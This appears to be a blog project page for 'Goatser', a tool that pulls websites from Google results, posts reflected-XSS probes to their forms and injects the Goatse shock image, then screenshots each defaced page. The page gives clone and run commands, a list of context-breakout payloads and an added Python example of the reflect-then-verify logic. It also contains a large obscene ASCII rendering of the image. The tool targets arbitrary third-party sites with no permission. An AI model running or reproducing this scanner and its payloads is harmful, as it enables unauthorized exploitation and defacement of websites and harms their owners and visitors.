Blog of :/

index

Eh

GOATSER

This corporate software aims to find trivial XSS issues on websites, exploit them to display the Goatse™ photo, and automatically take screenshots of the result.

download

Download

DEPENDENCIES

  • python-mechanize
  • python-lxml
third-party 'shotfactory':
  • tightvncserver
  • netpbm
  • xautomation
  • scrot


GIT IT

  $ git clone git://git.symlink.me/pub/romain/goatser.git
  

SETUP

There is nothing to install. First, copy example.conf to goatser.conf and edit it.

shotfactory has to be running before goatser is started:

  $ ./shotfactory.sh
  


USE IT

Then, run goatser:

  $ ./goatser.py KEYWORD [START-PAGE [NB]]
  

Parameters are:

  • KEYWORD: the keyword to search for on Google®.
  • START-PAGE: first results page to start from (default=1).
  • NB: number of results to analyze.

For example:

  $ ./goatser.py goatse 3 200
  

It is often better not to start on page 1, because the first results are mostly well-known websites, which rarely have such trivial XSS issues.

When an XSS is found, shotfactory takes a screenshot and puts it in the screenshots directory.


architecture

Architecture

Scheme:

.--------------------------------------------------------------------.
| File  Edit  View  History  Bookmarks  Tools  Help            _ O x |
| <- -> x o                                                          |
| URL: http://linux.com                                              |
|++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|                                                                    |
| WELCOME ON LINUX.COM LOL                                           |
|             _______________________________   ____                 |
|    Search: |<img src="http://goatse.es/h"/>| | GO |                |
|             ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯   ¯¯¯¯                 |
|        * g o a t s e x * g o a t s e x * g o a t s e x *           |
|        g                                               g           |
|        o /     \             \            /    \       o           |
|        a|       |             \          |      |      a           |
|        t|       `.             |         |       :     t           |
|        s`        |             |        \|       |     s           |
|        e \       | /       /  \\\   --__ \\       :    e           |
|        x  \      \/   _--~~          ~--__| \     |    x           |
|        *   \      \_-~                    ~-_\    |    *           |
|        g    \_     \        _.--------.______\|   |    g           |
|        o      \     \______// _ ___ _ (_(__>  \   |    o           |
|        a       \   .  C ___)  ______ (_(____>  |  /    a           |
|        t       /\ |   C ____)/      \ (_____>  |_/     t           |
|        s      / /\|   C_____)       |  (___>   /  \    s           |
|        e     |   (   _C_____)\______/  // _/ /     \   e           |
|        x     |    \  |__   \\_________// (__/       |  x           |
|        *    | \    \____)   `----   --'             |  *           |
|        g    |  \_          ___\       /_          _/ | g           |
|        o   |              /    |     |  \            | o           |
|        a   |             |    /       \  \           | a           |
|        t   |          / /    |         |  \           |t           |
|        s   |         / /      \__/\___/    |          |s           |
|        e  |         / /        |    |       |         |e           |
|        x  |          |         |    |       |         |x           |
|        * g o a t s e x * g o a t s e x * g o a t e x *             |
|                                                                    |
|                                                                    |
'--------------------------------------------------------------------'
		

A script named goatser.py is run with a keyword to search on Google®, and visits each website in the results. On every form it finds, it submits a trivial XSS probe: the pattern GOATSE. If the pattern comes back verbatim in the page loaded after posting the form, the script tries to inject the Goatse™ photo, then parses the document to check that the image really was included as an element (the reflection alone proves nothing if it lands inside an attribute value, a script string or the title). Sometimes the pattern has to escape that context first, for example with:

  • "/>
  • ';"/>--></script>
  • </title></head><body>

The bot also follows links on the main page whose text contains 'search' or 'cherch'.

Once the Goatse™ is confirmed to be included in the document, a snapshot request is created as a file in the queue/ directory. The shotfactory daemon then launches VNC and the browser, visits the website and takes a screenshot.
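The two-stage check described above (cheap marker reflection first, then a parser confirming that the image is a real element, trying each breakout prefix in turn) as an added, offline example. This is not Goatser's own code: the three "form handlers" are constructed stand-ins for the live sites it posts to, the marker word, the image URL and all function names are assumptions made for the example, and it uses the standard library's html.parser instead of lxml so it runs with no dependencies.

```python
"""Offline model of the reflect-then-verify loop (added example, not Goatser's
own code).  The three "form handlers" are constructed stand-ins for the live
sites; MARKER, IMG_URL and the function names are assumptions for this example.
Only the standard library is used (html.parser instead of lxml)."""
import html
from html.parser import HTMLParser

MARKER = "GOATSE"                         # cheap probe: is input reflected verbatim?
IMG_URL = "http://example.invalid/h.jpg"  # assumed image URL, not the real one
IMG_TAG = "<img src=" + IMG_URL + ">"     # unquoted src, so no quotes to clash with

# Breakout prefixes from the page, tried in order; "" means no escaping needed.
PREFIXES = ["", '"/>', "';\"/>--></script>", "</title></head><body>"]


class ImgFinder(HTMLParser):
    """Records the src of every <img> the parser builds as a real element.
    Text that merely looks like an <img> (inside an attribute value or a
    <script> string) never reaches handle_starttag, which is the point."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.append(dict(attrs).get("src"))


def image_included(page):
    """Stage 2: True only if our image URL is the src of a parsed <img>."""
    finder = ImgFinder()
    finder.feed(page)
    finder.close()
    return IMG_URL in finder.srcs


def probe(render):
    """Stage 1: submit the marker and see whether it comes back verbatim.
    Stage 2: if it does, submit prefix + image tag for each breakout prefix
    until the image is really part of the document.
    Returns (marker_reflected, winning_prefix_or_None)."""
    if MARKER not in render(MARKER):
        return False, None
    for prefix in PREFIXES:
        if image_included(render(prefix + IMG_TAG)):
            return True, prefix
    return True, None


# Constructed "servers": each reflects the submitted value into a different
# HTML context, standing in for the response to a posted search form.
def reflect_in_attribute(value):
    return '<form><input type="text" name="q" value="' + value + '"></form>'


def reflect_in_script(value):
    return "<script>var q = '" + value + "';</script>"


def reflect_escaped(value):
    # Correctly encoded output: the marker is still reflected, but no breakout
    # turns the payload into an element, so stage 2 rejects the false positive.
    return ('<form><input type="text" name="q" value="'
            + html.escape(value, quote=True) + '"></form>')


if __name__ == "__main__":
    for name, handler in [("attribute", reflect_in_attribute),
                          ("script", reflect_in_script),
                          ("escaped", reflect_escaped)]:
        reflected, prefix = probe(handler)
        print(name, "reflected" if reflected else "not reflected",
              "breakout=%r" % prefix)
```

The escaped handler shows why the page's second stage matters: the GOATSE marker is reflected there too, so a scanner that stopped at stage 1 would queue a screenshot of a site that is not exploitable.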


Example of results obtained with Goatser.

style

#home {
    font-family: Helvetica, Arial, Sans-Serif, Serif, Times;
    margin: auto;
    text-align: center;
}
p   {
    text-align: left;
}
ul, li {
  list-style-type: none;
  font-size: 1.2em;
}
.warning {
  font-size: 1.5em;
  border-bottom: 1px solid grey;
  padding-bottom: 10px;
}

.note {
 font-size: 2.1em;
 font-style: italic;
}

ul.menu li  {
  display: inline
}
.menu li a:before {
  content: "[ "
}
.menu li a:after {
  content: " ]"
}

.links li:before {
  content: "*"
}
.links li:after {
  content: "*"
}

img, img a {
  border: none;
}
img a:hover {
}
.links {
  border-bottom: 1px solid grey;
  padding-bottom: 10px;
}

#imggoatse a {
  margin: auto;
  background: url(hello.jpg);
  height: 360px;
  width: 445px;
  display: block;
}

#imggoatse a:hover {
  margin: auto;
  /*background: url(new.jpg);*/
  height: 360px;
  width: 445px;
  display: block;
}